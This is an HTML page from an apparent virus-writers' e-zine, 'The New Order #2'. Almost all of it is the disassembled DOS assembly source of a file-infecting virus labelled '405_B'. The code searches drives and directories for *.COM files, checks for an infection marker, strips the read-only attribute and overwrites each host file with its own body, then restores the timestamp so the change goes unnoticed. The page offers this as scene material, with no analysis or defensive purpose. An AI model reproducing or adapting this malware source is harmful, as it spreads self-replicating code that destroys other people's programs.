<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>405_B</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>BUFFER SEGMENT AT 0<br>
<br>
ORG 295H<br>
DW0295 DW ?<br>
DB0297 DB ?<br>
<br>
ORG 0E000H<br>
DWE000 DW ?<br>
<br>
ORG 0E195H<br>
DWE195 DW ?<br>
<br>
BUFFER ENDS<br>
<br>
CODE SEGMENT BYTE PUBLIC 'CODE'<br>
ASSUME CS:CODE,DS:NOTHING,ES:BUFFER<br>
<br>
VIRLEN EQU OFFSET ENDADR-START<br>
ORG 100H<br>
<br>
START: XCHG SI,AX<br>
ADD [BX+SI],AL<br>
SAHF<br>
ADD [BX+SI],AL<br>
NOP<br>
<br>
MOV AX,0<br>
MOV ES:DB0249,AL<br>
MOV ES:DB024B,AL <br>
MOV ES:DB028B,AL<br>
PUSH AX<br>
MOV AH,19H<br>
INT 21H<br>
MOV ES:DB0249,AL<br>
MOV AH,47H<br>
ADD AL,1 <br>
PUSH AX<br>
MOV DL,AL<br>
LEA SI,DB024B<br>
INT 21H<br>
POP AX<br>
MOV AH,0EH<br>
SUB AL,1<br>
MOV DL,AL<br>
INT 21H<br>
MOV ES:DB028B,AL<br>
BP0139: MOV AL,ES:DB0249<br>
CMP AL,0<br>
JNZ BP0152<br>
MOV AH,0EH<br>
MOV DL,2<br>
INT 21H<br>
MOV AH,19H<br>
INT 21H<br>
MOV ES:DB024A,AL<br>
JMP BP0179<br>
<br>
BP0152: CMP AL,1<br>
JNZ BP0167<br>
MOV AH,0EH<br>
MOV DL,2<br>
INT 21H <br>
MOV AH,19H<br>
INT 21H<br>
MOV ES:DB024A,AL<br>
JMP BP0179<br>
<br>
BP0167: CMP AL,2<br>
JNZ BP0179<br>
MOV AH,0EH<br>
MOV DL,0<br>
INT 21H<br>
MOV AH,19H<br>
INT 21H<br>
MOV ES:DB024A,AL<br>
BP0179: MOV AH,4EH<br>
MOV CX,1<br>
LEA DX,DB028C<br>
INT 21H<br>
JB BP0189<br>
JMP BP01A9<br>
<br>
BP0189: MOV AH,3BH<br>
LEA DX,DB0297<br>
INT 21H<br>
MOV AH,4EH<br>
MOV CX,0011H<br>
LEA DX,DB0292<br>
INT 21H<br>
JB BP0139<br>
JMP BP0179<br>
<br>
BP01A0: MOV AH,4FH<br>
INT 21H<br>
JB BP0189 <br>
JMP BP01A9<br>
<br>
; Process COM file<br>
<br>
BP01A9: MOV AH,3DH<br>
MOV AL,2<br>
MOV DX,009EH<br>
INT 21H<br>
MOV BX,AX<br>
MOV AH,3FH<br>
MOV CX,VIRLEN<br>
NOP<br>
MOV DX,OFFSET DWE000<br>
NOP<br>
INT 21H<br>
MOV AH,3EH<br>
INT 21H<br>
MOV BX,DWE000<br>
CMP BX,9600H<br>
JZ BP01A0<br>
MOV AH,43H<br>
MOV AL,0<br>
MOV DX,009EH<br>
INT 21H<br>
MOV AH,43H<br>
MOV AL,1<br>
AND CX,00FEH<br>
INT 21H<br>
MOV AH,3DH<br>
MOV AL,2<br>
MOV DX,009EH<br>
INT 21H<br>
MOV BX,AX<br>
MOV AH,57H<br>
MOV AL,0<br>
INT 21H<br>
PUSH CX<br>
PUSH DX<br>
ASSUME ES:NOTHING<br>
MOV DX,CS:DW0295<br>
MOV CS:DWE195,DX<br>
MOV DX,CS:DWE000+1<br>
LEA CX,DB0294-100H<br>
SUB DX,CX<br>
MOV CS:DW0295,DX<br>
MOV AH,40H<br>
MOV CX,VIRLEN<br>
NOP<br>
LEA DX,START<br>
INT 21H<br>
MOV AH,57H<br>
MOV AL,1<br>
POP DX<br>
POP CX<br>
INT 21H<br>
MOV AH,3EH <br>
INT 21H<br>
MOV DX,CS:DWE195<br>
MOV CS:DW0295,DX<br>
JMP BP0234<br>
<br>
BP0234: MOV AH,0EH<br>
MOV DL,CS:DB0249<br>
INT 21H<br>
MOV AH,3BH<br>
LEA DX,DB024A<br>
INT 21H<br>
MOV AH,0<br>
INT 21H<br>
<br>
DB0249 DB 2<br>
DB024A DB 0<br>
<br>
<br>
DB024B DB 'TEST', 3CH DUP (0)<br>
DB028B DB 0DH<br>
DB028C DB '*.COM', 0<br>
DB0292 DB '*', 0<br>
DB0294 DB 0E9H<br>
<br>
ENDADR EQU $<br>
<br>
CODE ENDS<br>
<br>
END START</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../Images/coollogo_com_21259199.jpg" border="0" width="518"
height="56"></a></p>
</body>
</html>
